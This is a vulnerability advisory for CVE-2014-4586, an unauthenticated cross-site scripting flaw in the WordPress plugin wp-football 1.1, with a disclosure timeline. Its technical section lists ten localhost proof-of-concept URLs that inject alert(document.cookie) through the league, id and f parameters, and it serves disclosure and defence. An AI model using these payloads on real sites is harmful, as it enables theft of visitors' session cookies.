Plugin Details
Plugin Name: wp-plugin : wp-football
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4586
Identified by : Anantshri
Disclosure Timeline
-
January 17, 2014: Vendor Contacted
- June 12, 2014 : Public Disclosure
Technical Details
http://localhost/wp-content/plugins/wp-football/football_classification.php?league=league">alert(document.cookie)&group=group
http://localhost/wp-content/plugins/wp-football/football_criteria.php?league=league'>alert(document.cookie)&
http://localhost/wp-content/plugins/wp-football/football-functions.php?ajax=1&id_group=id_group&id_league=id_league&f=f'>alert(document.cookie)&id_phase=id_phase
http://localhost/wp-content/plugins/wp-football/football_groups_list.php?action=action&paged=paged&id=id">alert(document.cookie)&byajax=byajax
http://localhost/wp-content/plugins/wp-football/football_matches_list.php?action=action&paged=paged&id=id">alert(document.cookie)&
http://localhost/wp-content/plugins/wp-football/football_matches_load.php?action=delete&paged=paged&id_group=id_group&id_league=id_league">alert(document.cookie)&id_phase=id
http://localhost/wp-content/plugins/wp-football/football_matches_phase.php?action=action&paged=paged&id=id">alert(document.cookie)&id_phase=id_phase
http://localhost/wp-content/plugins/wp-football/football_phases_list.php?action=action&paged=paged&id=id">alert(document.cookie)&
http://localhost/wp-content/plugins/wp-football/templates/template_default_preview.php?league=league">alert(document.cookie)&
http://localhost/wp-content/plugins/wp-football/templates/template_worldCup_preview.php?league=league">alert(document.cookie)&
Vulnerable Parameters : league, id, f